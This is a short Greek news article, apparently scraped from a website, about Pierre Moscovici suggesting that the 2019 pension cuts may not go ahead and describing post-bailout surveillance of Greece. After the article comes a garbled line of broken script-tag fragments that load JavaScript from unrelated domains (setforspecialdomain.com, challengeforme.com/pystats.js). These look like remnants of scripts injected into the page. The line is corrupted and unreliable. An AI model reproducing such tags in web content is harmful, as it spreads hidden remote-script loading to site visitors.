«Παράθυρο» από Μοσκοβισί για τη μη περικοπή των συντάξεων το 2019

Αποτέλεσμα εικόνας για Μοσκοβισί

Ανοιχτό το ενδεχόμενο να μη γίνουν οι περικοπές στις συντάξεις το 2019, αφήνει ο Ευρωπαίος Επίτροπος των Οικονομικών Πιερ Μοσκοβισί, σε συνέντευξή του, σημειώνοντας χαρακτηριστικά ότι «θα το συζητήσουμε όταν έρθει η ώρα».

Για το τέλος του προγράμματος ο ίδιος επισημαίνει, μιλώντας στην εφημερίδα Έθνος, ότι η επιτήρηση σε «καμία περίπτωση δεν έχει σχέση με ένα νέο πρόγραμμα».

Όπως τονίζει ο Πιερ Μοσκοβισί μετά την 21η Αυγούστου και το τέλος των μνημονίων «ουδείς θα πιέζει για νέα μέτρα, κανείς δεν θα απαιτεί νέες μεταρρυθμίσεις δεν θα υπάρχουν προαπαιτούμενα ούτε οι αξιολογήσεις που υπάρχουν μέχρι τώρα».

Για τη διαμάχη με την Νέα Δημοκρατία, όπως αυτή προέκυψε μετά την επίσκεψη του στην Ελλάδα και τις δηλώσεις του, ο Επίτροπος Οικονομικών σημειώνει ότι είναι φίλος της Ελλάδας και όσοι τον κατηγορούν ότι παίζει πολιτικά παιχνίδια, «είναι αυτοί που το κάνουν».

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >

Leave a Reply

Your email address will not be published. Required fields are marked *

*